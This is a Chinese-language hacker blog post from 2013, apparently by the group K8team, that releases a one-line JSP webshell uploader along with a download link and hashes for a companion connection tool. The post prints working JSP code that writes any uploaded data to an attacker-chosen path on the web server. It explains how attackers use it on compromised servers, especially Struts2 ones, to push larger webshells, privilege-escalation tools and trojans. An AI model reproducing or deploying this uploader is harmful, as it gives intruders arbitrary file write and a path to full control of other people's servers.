工具: K8upload_1125[K8]
编译: K8小组专用 Delphi7破解版
组织: K8搞基大队[K8team]
作者: K8拉登哥哥
博客: http://qqhack8.blog.163.com
发布: 2013/11/26 21:02:52
K8新型JSP小马(支持上传任意格式文件) 附有连接工具 以下代码自己保存为 upload.jsp
<%@page import="java.io.*"%><%if(request.getParameter("f")!=null){FileOutputStream os=new FileOutputStream(application.getRealPath("/")+request.getParameter("f"));InputStream is=request.getInputStream();byte[] b=new byte[512];int n;while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();}%>
灵感来自于前断时间写的HTTP协议的马,除了JSP其它脚本也会陆续公开给大家
其实就是文件流操作,WEB程序员们经常用到,上传图片各种文件啥的,
但没人想到过用在这方面,对于JAVA我也不怎么懂,这个一句话,我也是百度关键字 JSP 文件流后
从百度那些Web程序员几百行代码的文件流操作例子里 浓缩出来的 其实我不懂JAVA,看得头真大 。
简介:
传统小马只支持上传大马等文本文件,我们一般都是先把大马传到服务器,
然后再上传cmd.exe或pr.exe等等其它相关提权工具,又或者直接上传木马.
但是有时候,我们根本就无法上传WebShell大马,或者说传过去功能爆废了.
特别是Struts2环境,大家应该深有感悟。碰到好多,只能传那个普通的一句话小马
但是要传个大马啥的,基本上全都废了。但是这样我们就没办法了吗?答案是NO.
图片:
功能:
下载地址:
文件: K8upload_1125[K8].rar
MD5: D55CAFE4E1764825C0980C701A84EDC2
SHA1: 3BA9F7CBECB9C95B8272EEB280D2F323123D4AAE
平台: XP/Vista/Win7/Win8/2000/2003/2008/2012
猛击:
http://pan.baidu.com/s/1gI3n提示:
下载后一定要校验文件的SHA1值是否正确,如不符则可能文件损坏或被人捆木马.
不推荐校验MD5 (微软官方主页上的产品都不再提供文件的MD5),因为可以碰撞
校验MD5并不能保证你所使用的就真是原文件,一般的黑客搞不了,但XX黑客就...
注意:
在K8拉登哥哥BLOG里下载的,工具一但更新,旧版地址若是失效,将不再提供下载.
评论